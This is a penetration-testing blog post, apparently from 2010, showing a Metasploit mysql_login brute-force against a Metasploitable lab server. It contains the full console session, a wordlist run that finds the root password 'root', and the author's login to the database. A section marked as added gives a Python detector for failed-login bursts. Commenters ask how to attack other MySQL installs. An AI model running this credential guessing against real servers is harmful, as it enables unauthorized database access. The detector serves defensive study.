Bruteforce MySQL Using Metasploit…

July 3, 2010 at 11:52 am (Metasploit, Security)

Hey guys,

I will demonstrate how to brute force MySQL logins using Metasploit. This is another attack against the Metasploitable distribution I mentioned in my previous post. It is very simple and shouldn’t take long to demonstrate, so here goes:

root@bt:/pentest/exploits/framework3# ./msfconsole


=[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ -- --=[ 566 exploits - 276 auxiliary
+ -- --=[ 210 payloads - 27 encoders - 8 nops
=[ svn r9671 updated today (2010.07.03)

msf > search mysql
[*] Searching loaded modules for pattern 'mysql'...

Auxiliary
=========

Name                         Rank    Description
----                         ----    -----------
admin/mysql/mysql_enum       normal  MySQL Enumeration Module
admin/mysql/mysql_sql        normal  MySQL SQL Generic Query
admin/tikiwiki/tikidblib     normal  TikiWiki information disclosure
scanner/mysql/mysql_login    normal  MySQL Login Utility
scanner/mysql/mysql_version  normal  MySQL Server Version Enumeration

Exploits
========

Name                             Rank     Description
----                             ----     -----------
linux/mysql/mysql_yassl_getname  good     MySQL yaSSL CertDecoder::GetName Buffer Overflow
linux/mysql/mysql_yassl_hello    good     MySQL yaSSL SSL Hello Message Buffer Overflow
windows/mysql/mysql_yassl_hello  average  MySQL yaSSL SSL Hello Message Buffer Overflow

msf > use scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options

Module options:

Name              Current Setting  Required  Description
----              ---------------  --------  -----------
BLANK_PASSWORDS   true             yes       Try blank passwords for all users
BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
PASSWORD                           no        A specific password to authenticate with
PASS_FILE                          no        File containing passwords, one per line
RHOSTS                             yes       The target address range or CIDR identifier
RPORT             3306             yes       The target port
STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
THREADS           1                yes       The number of concurrent threads
USERNAME                           no        A specific username to authenticate as
USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
USER_FILE                          no        File containing usernames, one per line
VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(mysql_login) > set PASS_FILE /root/password.txt
PASS_FILE => /root/password.txt
msf auxiliary(mysql_login) > set USER_FILE /root/users.txt
USER_FILE => /root/users.txt
msf auxiliary(mysql_login) > set RHOSTS 10.113.8.102
RHOSTS => 10.113.8.102
msf auxiliary(mysql_login) > show options

Module options:

Name              Current Setting     Required  Description
----              ---------------     --------  -----------
BLANK_PASSWORDS   true                yes       Try blank passwords for all users
BRUTEFORCE_SPEED  5                   yes       How fast to bruteforce, from 0 to 5
PASSWORD                              no        A specific password to authenticate with
PASS_FILE         /root/password.txt  no        File containing passwords, one per line
RHOSTS            10.113.8.102        yes       The target address range or CIDR identifier
RPORT             3306                yes       The target port
STOP_ON_SUCCESS   false               yes       Stop guessing when a credential works for a host
THREADS           1                   yes       The number of concurrent threads
USERNAME                              no        A specific username to authenticate as
USERPASS_FILE                         no        File containing users and passwords separated by space, one pair per line
USER_FILE         /root/users.txt     no        File containing usernames, one per line
VERBOSE           true                yes       Whether to print output for all attempts

msf auxiliary(mysql_login) > exploit

[*] 10.113.8.102:3306 - Found remote MySQL version 5.0.51a
[*] 10.113.8.102:3306 Trying username:'admin' with password:''
[*] 10.113.8.102:3306 failed to login as 'admin' with password ''
[*] 10.113.8.102:3306 Trying username:'root' with password:''
[*] 10.113.8.102:3306 failed to login as 'root' with password ''
[*] 10.113.8.102:3306 Trying username:'god' with password:''
[*] 10.113.8.102:3306 failed to login as 'god' with password ''
[*] 10.113.8.102:3306 Trying username:'systemadm' with password:''
[*] 10.113.8.102:3306 failed to login as 'systemadm' with password ''
[*] 10.113.8.102:3306 Trying username:'daemon' with password:''
[*] 10.113.8.102:3306 failed to login as 'daemon' with password ''
[*] 10.113.8.102:3306 Trying username:'admin' with password:'pass'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'pass'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'password'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'password'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'PASSWD'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'PASSWD'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'passwd'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'passwd'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'Password'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'Password'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'admin'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'admin'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'root'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'root'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'adminadmin'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'adminadmin'
[*] 10.113.8.102:3306 Trying username:'root' with password:'pass'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'pass'
[*] 10.113.8.102:3306 Trying username:'root' with password:'password'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'password'
[*] 10.113.8.102:3306 Trying username:'root' with password:'PASSWD'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'PASSWD'
[*] 10.113.8.102:3306 Trying username:'root' with password:'passwd'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'passwd'
[*] 10.113.8.102:3306 Trying username:'root' with password:'Password'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'Password'
[*] 10.113.8.102:3306 Trying username:'root' with password:'admin'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'admin'
[*] 10.113.8.102:3306 Trying username:'root' with password:'root'
[+] 10.113.8.102:3306 - SUCCESSFUL LOGIN 'root' : 'root'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_login) >

Bingo! We found the root password which is simply ‘root’ 🙂 Now let’s double check this:

root@bt:/pentest/exploits/framework3# mysql -h 10.113.8.102 -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 53
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| tikiwiki |
| tikiwiki195 |
+--------------------+
4 rows in set (0.01 sec)

mysql>

Now we have complete control over their database, yay! 🙂
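
Seen from the server side, the run above is a burst of access-denied errors from one source: blank-password attempts across every username, then the wordlist against each user. The following is an added example, not part of the original post, that flags that pattern in a MySQL error log. It assumes the server records failed logins there (log_warnings above 1 on older servers, log_error_verbosity=3 on 5.7 and later); the source address 10.113.8.50, the application host, the log prefix and the thresholds are constructed for illustration.

```python
import re
from collections import defaultdict

# The server's standard access-denied message (error 1045).
DENIED = re.compile(
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']*)' "
    r"\(using password: (?P<pw>YES|NO)\)"
)

def detect_bruteforce(lines, min_failures=10, min_users=3):
    """Return {source_host: stats} for sources that look like credential guessing.

    A source is flagged when it fails often enough, or fails against several
    different accounts (a legitimate client normally uses one account).
    """
    stats = defaultdict(lambda: {"failures": 0, "users": set(), "blank": 0})
    for line in lines:
        m = DENIED.search(line)
        if not m:
            continue
        s = stats[m["host"]]
        s["failures"] += 1
        s["users"].add(m["user"])
        if m["pw"] == "NO":          # attempt with an empty password
            s["blank"] += 1
    return {
        host: s for host, s in stats.items()
        if s["failures"] >= min_failures or len(s["users"]) >= min_users
    }

def build_sample_log():
    """Constructed log lines mirroring the failed attempts shown in the post."""
    prefix = "100703 11:40:00 [Warning] "   # constructed; the parser ignores it
    denied = prefix + "Access denied for user '{}'@'{}' (using password: {})"
    src = "10.113.8.50"                      # constructed scanner address
    users = ["admin", "root", "god", "systemadm", "daemon"]
    lines = [denied.format(u, src, "NO") for u in users]    # blank-password pass
    lines += [denied.format("admin", src, "YES")] * 8       # wordlist vs admin
    lines += [denied.format("root", src, "YES")] * 6        # wordlist vs root
    # One mistyped password from an application host: must not be flagged.
    lines.append(denied.format("tiki", "10.113.8.7", "YES"))
    return lines

if __name__ == "__main__":
    for host, s in detect_bruteforce(build_sample_log()).items():
        print(host, s["failures"], sorted(s["users"]), s["blank"])
```

The login that finally succeeds does not appear in this log, so an alert on the failure burst should be followed by a review of what that source did next.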

6 Comments

  1. Jonathan said,

    I tried to attack mysql 5.0.77 on CentOS and got this response from metasploit:

    “Unsupported target version of MySQL detected. Skipping”

    What versions of mysql can I attack?

  2. Jonathan said,

    Poking around, I guess I have to modify

    msf3/modules/auxiliary/scanner/mysql/mysql_version.rb

    correct?

  3. 0xzoidberg said,

    Hey Jonathan,

    Sorry for the late reply, in the middle of moving jobs and house 🙂

    I demonstrated a simple MySQL brute force attack using the mysql_login module. This will work with any recent version of MySQL, as it's just running through a username/password list and trying the combinations, a very simple brute force attack.

    The module that you are talking about just version-enumerates a MySQL server (basically tells you what version of MySQL it's running), so it is not an intrusive module, nor is the scanner.

    Also, if you run the following commands:

    info auxiliary/scanner/mysql/mysql_version

    and

    info auxiliary/scanner/mysql/mysql_login

    It will tell you what the module does, what version it affects, etc…

    If you show me what you're doing and how you're doing it, and also what you want to achieve, I will endeavour to help you.

    zoidberg

  4. Marshall said,

    Hi 0xzoidberg,
    I have the same problem as Jonathan.

    I tried to attack MySQL (came with WAMP server) on an XP machine but I had this message

    [-] 192.168.0.10:3306 – Unsupported target version of MySQL detected. Skipping.
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

    Help
    Thanks!

  5. zeestuff said,

    Can you tell me where I can find the password.txt?

  6. NightFury said,

    Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE, PASS_FILE.

    What to do?!
